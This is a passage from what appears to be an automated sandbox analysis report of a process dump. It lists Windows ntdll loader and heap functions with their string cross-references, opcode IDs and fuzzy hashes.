                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01A90D60
                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01A90D74
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.2336234768.0000000001A20000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A20000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_1a20000_SW_5724.jbxd
                                                                                  Similarity
                                                                                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 1404860816-0
                                                                                  • Opcode ID: 7565bd72c98f0062543d29c212f5797ad6211ec6d8b967e5dabea4c11223a8af
                                                                                  • Instruction ID: 53c609f61b4bd42cd33bb2f3da3f4cd2e7c760b519a57fefe9f54aceaef0b5e6
                                                                                  • Opcode Fuzzy Hash: 7565bd72c98f0062543d29c212f5797ad6211ec6d8b967e5dabea4c11223a8af
                                                                                  • Instruction Fuzzy Hash: B3426B75900715DFDB21CF28C980BAAB7F9FF04314F1445AAE999EB241E770AA85CF60
                                                                                  Function 01A5A3C0 Relevance: 5.3, Strings: 4, Instructions: 290COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.2336234768.0000000001A20000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A20000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_1a20000_SW_5724.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                                                  • API String ID: 0-379654539
                                                                                  • Opcode ID: 95a856dede7d4414ec44c2cb87dc712043eab1e817589ca4b882edfd4e40e10c
                                                                                  • Instruction ID: b85289647787aaf1f02c43102e31706290bce0cc0dd568898155a80a76503006
                                                                                  • Opcode Fuzzy Hash: 95a856dede7d4414ec44c2cb87dc712043eab1e817589ca4b882edfd4e40e10c
                                                                                  • Instruction Fuzzy Hash: 88C16D7420C382CFD751CF68C144BAABBF4BF89704F044A6AF9958B252E734D949CB56
                                                                                  Function 01A88402 Relevance: 5.3, Strings: 4, Instructions: 263COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 01A8855E
                                                                                  • @, xrefs: 01A88591
                                                                                  • minkernel\ntdll\ldrinit.c, xrefs: 01A88421
                                                                                  • LdrpInitializeProcess, xrefs: 01A88422
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.2336234768.0000000001A20000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A20000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_1a20000_SW_5724.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                                                  • API String ID: 0-1918872054
                                                                                  • Opcode ID: f8d4fc52f2bc30a00d4a23d7a1ec3a4fe7cae7918e8f918458bdfb626281e2d3
                                                                                  • Instruction ID: 13bcdcf14d1dedebd7bc7f6c0c7a9074d58ca79b3f1bdb2aa88be4ddae8177ba
                                                                                  • Opcode Fuzzy Hash: f8d4fc52f2bc30a00d4a23d7a1ec3a4fe7cae7918e8f918458bdfb626281e2d3
                                                                                  • Instruction Fuzzy Hash: 9A918B71609345AFDB21EF65CD40FABBAECBF84654F80092EFA8492151E734DA44CB62
                                                                                  Function 01A8273C Relevance: 5.2, Strings: 4, Instructions: 249COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 01AC21D9, 01AC22B1
                                                                                  • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 01AC22B6
                                                                                  • .Local, xrefs: 01A828D8
                                                                                  • SXS: %s() passed the empty activation context, xrefs: 01AC21DE
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.2336234768.0000000001A20000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A20000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_1a20000_SW_5724.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                                                  • API String ID: 0-1239276146
                                                                                  • Opcode ID: 0dbb878bb8494b79522981c70771bf05d9c265056e606acefce85324a53fce3d
                                                                                  • Instruction ID: 75ff346faa4229d01469bd261a8e9647f75e62f7a40a8af6d9b0eb52cd06d2fa
                                                                                  • Opcode Fuzzy Hash: 0dbb878bb8494b79522981c70771bf05d9c265056e606acefce85324a53fce3d
                                                                                  • Instruction Fuzzy Hash: 1DA1BE35900229DBDF25EF68CC88BA9B7B5BF58754F1441EAE908EB251D7309E81CF90
                                                                                  Function 01A84AD0 Relevance: 5.2, Strings: 4, Instructions: 228COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  • RtlDeactivateActivationContext, xrefs: 01AC3425, 01AC3432, 01AC3451
                                                                                  • SXS: %s() called with invalid flags 0x%08lx, xrefs: 01AC342A
                                                                                  • SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 01AC3456
                                                                                  • SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 01AC3437
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.2336234768.0000000001A20000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A20000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_1a20000_SW_5724.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
                                                                                  • API String ID: 0-1245972979
                                                                                  • Opcode ID: c5c025dacc580b3f8323d27788e8c80485cee056b1c7bf29ac0adb15d1f39f0b
                                                                                  • Instruction ID: f85c3cc527f043247328c831c252dfac44b1423afb7e195a6257ae560d3010c8
                                                                                  • Opcode Fuzzy Hash: c5c025dacc580b3f8323d27788e8c80485cee056b1c7bf29ac0adb15d1f39f0b
                                                                                  • Instruction Fuzzy Hash: 86611276640B12AFDB22DF1DC941B2AF7E5FF94B51F18851DE8559B241C730E801CB91
                                                                                  Function 01A564AB Relevance: 5.2, Strings: 4, Instructions: 211COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 01AB0FE5
                                                                                  • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 01AB1028
                                                                                  • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 01AB106B
                                                                                  • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 01AB10AE
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.2336234768.0000000001A20000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A20000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_1a20000_SW_5724.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                                                  • API String ID: 0-1468400865
                                                                                  • Opcode ID: c236d07a5e44f977de1b5d43ea6ba2d09e517cc8a722ea790bb015b25e18a12c
                                                                                  • Instruction ID: 69a7809202d56d92cd8c3f1e19b75ff2546cd5a1162182bf6b3a336422d3c54b
                                                                                  • Opcode Fuzzy Hash: c236d07a5e44f977de1b5d43ea6ba2d09e517cc8a722ea790bb015b25e18a12c
                                                                                  • Instruction Fuzzy Hash: CC7101B1948345AFCB61DF28C980B9B7FA8AF94768F840428FD498B146D734D588CBD1
                                                                                  Function 01A7245A Relevance: 5.1, Strings: 4, Instructions: 111COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  • LdrpDynamicShimModule, xrefs: 01ABA998
                                                                                  • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 01ABA992
                                                                                  • minkernel\ntdll\ldrinit.c, xrefs: 01ABA9A2
                                                                                  • apphelp.dll, xrefs: 01A72462
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.2336234768.0000000001A20000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A20000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_1a20000_SW_5724.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                  • API String ID: 0-176724104
                                                                                  • Opcode ID: b06b07190213e1677ebe239684a8028993c88b607942b5942fdacd6839f2f159
                                                                                  • Instruction ID: 2ff2a2426e37ea53bcfd1ffd728a55b624cf552dd9875466aefb462a64f3b379
                                                                                  • Opcode Fuzzy Hash: b06b07190213e1677ebe239684a8028993c88b607942b5942fdacd6839f2f159
                                                                                  • Instruction Fuzzy Hash: 6631467A700251ABEB35DF5DC9C1FAABBB8FB84B00F19801EF801A7256C7709941C790
                                                                                  Function 01A629A0 Relevance: 4.7, Strings: 3, Instructions: 966COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 01A6327D
                                                                                  • HEAP: , xrefs: 01A63264
                                                                                  • HEAP[%wZ]: , xrefs: 01A63255
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.2336234768.0000000001A20000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A20000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_1a20000_SW_5724.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                                                                  • API String ID: 0-617086771
                                                                                  • Opcode ID: c6f83357c38a22cca424c596a31d90067e89d7050bb932e6c2c7fd67f201432d
                                                                                  • Instruction ID: 2a657797828596b2308e357b31dfa901073a5d0628930ef171ab479a8f6f1256
                                                                                  • Opcode Fuzzy Hash: c6f83357c38a22cca424c596a31d90067e89d7050bb932e6c2c7fd67f201432d
                                                                                  • Instruction Fuzzy Hash: A1929A70A04249DFDF25CF68C4447AEBBF5FF48310F1880AAE959AB392D735A946CB50
                                                                                  Function 01A60770 Relevance: 4.2, Strings: 3, Instructions: 414COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.2336234768.0000000001A20000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A20000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_1a20000_SW_5724.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                                                  • API String ID: 0-4253913091
                                                                                  • Opcode ID: 54149d64d88c622571c53d70c9f781f1bff30f1815458fd31fde3b2489d951d4
                                                                                  • Instruction ID: f12df4b6bb5523398f080372416ea153123b1592a178c2edd0b1dbc1f0d8ffe5
                                                                                  • Opcode Fuzzy Hash: 54149d64d88c622571c53d70c9f781f1bff30f1815458fd31fde3b2489d951d4
                                                                                  • Instruction Fuzzy Hash: 9AF1B031A00645DFEB16CF68C994BAAB7F9FF44304F1481A8E556DB382D734E981CB90
                                                                                  Function 01A76962 Relevance: 4.0, Strings: 2, Instructions: 1492COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.2336234768.0000000001A20000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A20000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_1a20000_SW_5724.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: $@
                                                                                  • API String ID: 0-1077428164
                                                                                  • Opcode ID: ecd038e99612fdf864259aed4dcbb728171c229e1e0b9ead248c26c720415b1c
                                                                                  • Instruction ID: db468b670294745b396bf4d6cf1aff0caceb1d15c893cbbe44d7ad615e2900e1
                                                                                  • Opcode Fuzzy Hash: ecd038e99612fdf864259aed4dcbb728171c229e1e0b9ead248c26c720415b1c
                                                                                  • Instruction Fuzzy Hash: 16C2A1716087819FEB25CF68C884BABBBE5BF88714F04892DF989C7241D734D945CB92
                                                                                  Function 01A4A197 Relevance: 4.0, Strings: 3, Instructions: 238COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.2336234768.0000000001A20000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A20000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_1a20000_SW_5724.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: FilterFullPath$UseFilter$\??\
                                                                                  • API String ID: 0-2779062949
                                                                                  • Opcode ID: 65761e0e176025362a9e41c230a43b5433555232dfc16b66d7e9a458c64d075c
                                                                                  • Instruction ID: fd361c5281089e4b2d5fa178dc0b321d9845e74515be885912c65c36d84e688d
                                                                                  • Opcode Fuzzy Hash: 65761e0e176025362a9e41c230a43b5433555232dfc16b66d7e9a458c64d075c
                                                                                  • Instruction Fuzzy Hash: 27A17B769012299BEF31DF68CD88BAAB7B8FF44710F0041EAE909A7250D7359E84CF50
                                                                                  Function 01A70BCB Relevance: 4.0, Strings: 3, Instructions: 210COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  • LdrpCheckModule, xrefs: 01ABA117
                                                                                  • Failed to allocated memory for shimmed module list, xrefs: 01ABA10F
                                                                                  • minkernel\ntdll\ldrinit.c, xrefs: 01ABA121
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.2336234768.0000000001A20000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A20000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_1a20000_SW_5724.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                                                  • API String ID: 0-161242083
                                                                                  • Opcode ID: 3c3dacd42c4a22058584f5601f44ca00396e3667678baa6ef0e207194c9de722
                                                                                  • Instruction ID: aa9d5b60ca2669eb9f84ee119b58e41c4b245afff8e392e889fb7ca747b6b373
                                                                                  • Opcode Fuzzy Hash: 3c3dacd42c4a22058584f5601f44ca00396e3667678baa6ef0e207194c9de722
                                                                                  • Instruction Fuzzy Hash: B771CF75A00205DFDB29DF68CE81ABEB7F4FB45704F18802DE806E7251E734AA41CB50
                                                                                  Function 01A8C720 Relevance: 3.9, Strings: 3, Instructions: 141COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  • minkernel\ntdll\ldrinit.c, xrefs: 01AC82E8
                                                                                  • Failed to reallocate the system dirs string !, xrefs: 01AC82D7
                                                                                  • LdrpInitializePerUserWindowsDirectory, xrefs: 01AC82DE
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.2336234768.0000000001A20000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A20000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_1a20000_SW_5724.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                                                  • API String ID: 0-1783798831
                                                                                  • Opcode ID: a350dd485bd0b67b91541201de5cf7e687ce391101ee0492c16a574f00879c56
                                                                                  • Instruction ID: abbd5ce852798f69202fcfbf1702e1d5c353203eb945e2a20ab288354630ab9f
                                                                                  • Opcode Fuzzy Hash: a350dd485bd0b67b91541201de5cf7e687ce391101ee0492c16a574f00879c56
                                                                                  • Instruction Fuzzy Hash: EA41EFB5540311ABC721FB68DE44B9B7BE8FB58B60F04882AF948D3254E774D8008BA1
                                                                                  Function 01B0C188 Relevance: 3.9, Strings: 3, Instructions: 123COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 01B0C1C5
                                                                                  • @, xrefs: 01B0C1F1
                                                                                  • PreferredUILanguages, xrefs: 01B0C212
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.2336234768.0000000001A20000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A20000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_1a20000_SW_5724.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                                                  • API String ID: 0-2968386058
                                                                                  • Opcode ID: 41b238221f2a05b94b45b4c8082a78a95ee84889709721292fc0f80a2ee0e5f6
                                                                                  • Instruction ID: 86d673c9aafe2ce2b3115bc5d229f0ec904d4d62b1d697bf280b69cf82657c4b
                                                                                  • Opcode Fuzzy Hash: 41b238221f2a05b94b45b4c8082a78a95ee84889709721292fc0f80a2ee0e5f6
                                                                                  • Instruction Fuzzy Hash: EB416171E00209EBDF16DED8C981BEEBFB8EB54700F1442AAE609A7690D7749A448B50
                                                                                  Function 01AE4144 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.2336234768.0000000001A20000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A20000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_1a20000_SW_5724.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                                                  • API String ID: 0-1373925480
                                                                                  • Opcode ID: e6093539b2a619d85ef01f622860e2a8bde678b927d7e7cb0a63890d3217a185
                                                                                  • Instruction ID: 1b1a528439568271387b58d6d9c63e3c4fb720020e5f834838b697fc34faddac
                                                                                  • Opcode Fuzzy Hash: e6093539b2a619d85ef01f622860e2a8bde678b927d7e7cb0a63890d3217a185
                                                                                  • Instruction Fuzzy Hash: 9541D071A04758CBEB269BE8C948BADBBF8FF59340F18045ADA05EB791D7349901CB10
                                                                                  Function 01AD4755 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  • LdrpCheckRedirection, xrefs: 01AD488F
                                                                                  • minkernel\ntdll\ldrredirect.c, xrefs: 01AD4899
                                                                                  • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 01AD4888
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.2336234768.0000000001A20000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A20000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_1a20000_SW_5724.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                                  • API String ID: 0-3154609507
                                                                                  • Opcode ID: 67c33a54172ee01a35bf4fb357cabc467b7ddc2850d6960fe46aa850486d5015
                                                                                  • Instruction ID: 3457e616d9d25e44079767d794d1c6a4476e034e478178d07731ba067bfa35f6
                                                                                  • Opcode Fuzzy Hash: 67c33a54172ee01a35bf4fb357cabc467b7ddc2850d6960fe46aa850486d5015
                                                                                  • Instruction Fuzzy Hash: 0241B436A04B519FCB22CF6DD941A2A7BE5BF4DA90F0A055DED8AD7B11D730D800CB91
                                                                                  Function 01A60BBE Relevance: 3.8, Strings: 3, Instructions: 70COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.2336234768.0000000001A20000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A20000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_1a20000_SW_5724.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                                                                  • API String ID: 0-2558761708
                                                                                  • Opcode ID: b625e0a173a22295aca5294893ba3bae88d6b202eb81829fa13d1dee83c6824b
                                                                                  • Instruction ID: 2db8c89d33ff57100896abf9301ccc4552f2513e6e3e5d05154f4aa563e99a3d
                                                                                  • Opcode Fuzzy Hash: b625e0a173a22295aca5294893ba3bae88d6b202eb81829fa13d1dee83c6824b
                                                                                  • Instruction Fuzzy Hash: 8E11B131715182EFDB29DB29C581BB6B7AAFF41A15F18C169F406CB293DB38D880C750
                                                                                  Function 01AD20DE Relevance: 3.8, Strings: 3, Instructions: 41COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  • LdrpInitializationFailure, xrefs: 01AD20FA
                                                                                  • Process initialization failed with status 0x%08lx, xrefs: 01AD20F3
                                                                                  • minkernel\ntdll\ldrinit.c, xrefs: 01AD2104
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.2336234768.0000000001A20000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A20000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_1a20000_SW_5724.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                                                  • API String ID: 0-2986994758
                                                                                  • Opcode ID: fe22576ba55cc1deb36c70b993a61e293bb52713d2b77e9b52a07de97b1acc14
                                                                                  • Instruction ID: e4681c252f378512afba0ef08564c48c5cf563c1818a12754ce51da3c88fd550
                                                                                  • Opcode Fuzzy Hash: fe22576ba55cc1deb36c70b993a61e293bb52713d2b77e9b52a07de97b1acc14
                                                                                  • Instruction Fuzzy Hash: 16F04678640708BBE720EB1CCD02F993BB8FB80B04F14406AFA40B7281D2F0A900C680
                                                                                  Function 01A603E9 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 184COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.2336234768.0000000001A20000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A20000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_1a20000_SW_5724.jbxd
                                                                                  Similarity
                                                                                  • API ID: ___swprintf_l
                                                                                  • String ID: #%u
                                                                                  • API String ID: 48624451-232158463
                                                                                  • Opcode ID: 7e9ba1823d8691249c1d1c29eaed9e690f86e27d79ad9c5be8ac99620f50f33e
                                                                                  • Instruction ID: b0cc6a4103efd914d691b03fc1866c1535af9eab4b9eb45177a28915f4c6a06d
                                                                                  • Opcode Fuzzy Hash: 7e9ba1823d8691249c1d1c29eaed9e690f86e27d79ad9c5be8ac99620f50f33e
                                                                                  • Instruction Fuzzy Hash: 05713871A0014A9FDF11DFA8CA94BAEB7F8FF18744F144065E905E7252EA34EE45CBA0
                                                                                  Function 01A5A9D0 Relevance: 2.9, Strings: 2, Instructions: 421COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  • LdrResSearchResource Exit, xrefs: 01A5AA25
                                                                                  • LdrResSearchResource Enter, xrefs: 01A5AA13
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.2336234768.0000000001A20000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A20000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_1a20000_SW_5724.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                                                                                  • API String ID: 0-4066393604
                                                                                  • Opcode ID: eee15dd1d40e6e0dd7db55c03ddc87cda516b40ec6709ccde2264e7d49080f55
                                                                                  • Instruction ID: e78c2d7b83f4a941be0262c4f3cda0fbe945502c66eb305845c57b4c379aa8cd
                                                                                  • Opcode Fuzzy Hash: eee15dd1d40e6e0dd7db55c03ddc87cda516b40ec6709ccde2264e7d49080f55
                                                                                  • Instruction Fuzzy Hash: 65E16171F04259ABEF62CF99C980BEEBBB9BF04310F154626EE01E7252D7749941CB50
                                                                                  Function 01B1A352 Relevance: 2.8, Strings: 2, Instructions: 348COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.2336234768.0000000001A20000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A20000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_1a20000_SW_5724.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: `$`
                                                                                  • API String ID: 0-197956300
                                                                                  • Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                                                  • Instruction ID: 4fcdb65a79776e6d45b8c60eb00f6dc6ef2c1295a64f398204c1dbf5c0e9e438
                                                                                  • Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                                                  • Instruction Fuzzy Hash: 1DC1D1312053829BEB29CF28C840B6BBBE5FFC4314F494A6DF6968B298D775E505CB41
                                                                                  Function 01ACE6F2 Relevance: 2.7, Strings: 2, Instructions: 179COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.2336234768.0000000001A20000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A20000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_1a20000_SW_5724.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID: Legacy$UEFI
                                                                                  • API String ID: 2994545307-634100481
                                                                                  • Opcode ID: 13e7a61c84c8556c9e6e60497f4540b3f20951dc6aa8db6fe4869cecb79f3e75
                                                                                  • Instruction ID: 81a2b3463aea09e1054b1094942e6e2647c89ee56b576e73b114fb509e1d6c89
                                                                                  • Opcode Fuzzy Hash: 13e7a61c84c8556c9e6e60497f4540b3f20951dc6aa8db6fe4869cecb79f3e75
                                                                                  • Instruction Fuzzy Hash: F9614BB1E003199FDB25DFA9C940BAEBBF9FB48B00F14406DE659EB251D731A940CB50
                                                                                  Function 01AF43D4 Relevance: 2.7, Strings: 2, Instructions: 169COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.2336234768.0000000001A20000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A20000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_1a20000_SW_5724.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: @$MUI
                                                                                  • API String ID: 0-17815947
                                                                                  • Opcode ID: 9b4342c58bfdc1bd7a09a8238a51a33f0c0ae39cc5dfc5ad46525cb1594aa81b
                                                                                  • Instruction ID: f5ffbfd45c5cff71fef82405f9ec2b8a87ff76a6ede7c6d3ab372d7095b3629d
                                                                                  • Opcode Fuzzy Hash: 9b4342c58bfdc1bd7a09a8238a51a33f0c0ae39cc5dfc5ad46525cb1594aa81b
                                                                                  • Instruction Fuzzy Hash: 4351F771D0021DAFEF11DFE9CD84AEFBBB9AB48654F10052AE611B7290D7309E458BA0
                                                                                  Function 01A504E5 Relevance: 2.7, Strings: 2, Instructions: 153COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  • kLsE, xrefs: 01A50540
                                                                                  • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 01A5063D
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.2336234768.0000000001A20000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A20000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_1a20000_SW_5724.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                                                  • API String ID: 0-2547482624
                                                                                  • Opcode ID: b0fce257ca16c98bd95a1b2925443c8d1ff56a652ae00fbbeca0e26f21ab79a5
